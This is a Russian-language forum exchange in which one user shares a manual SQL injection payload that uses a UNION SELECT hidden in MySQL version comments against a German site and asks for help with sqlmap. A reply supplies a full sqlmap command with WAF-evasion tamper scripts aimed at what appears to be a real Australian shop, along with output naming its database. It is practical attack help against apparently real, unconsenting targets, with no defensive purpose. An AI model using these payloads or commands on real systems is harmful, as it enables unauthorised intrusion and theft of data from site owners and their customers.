07.05.2022, 12:04
|
|
Участник форума
Регистрация: 31.07.2015
Сообщений: 111
Провел на форуме:
36807
Репутация:
1
|
|
Сообщение от exe-world
↑
Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
.SpoilerTarget" type="button">Spoiler: sqlmap payload
python3 sqlmap.py -u " https://mkeducationalsupplies.com.au...productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,spa ce2comment,unionalltounion --fresh-queries
available databases [1]:
[*] mkeducat_books2019
|
|
|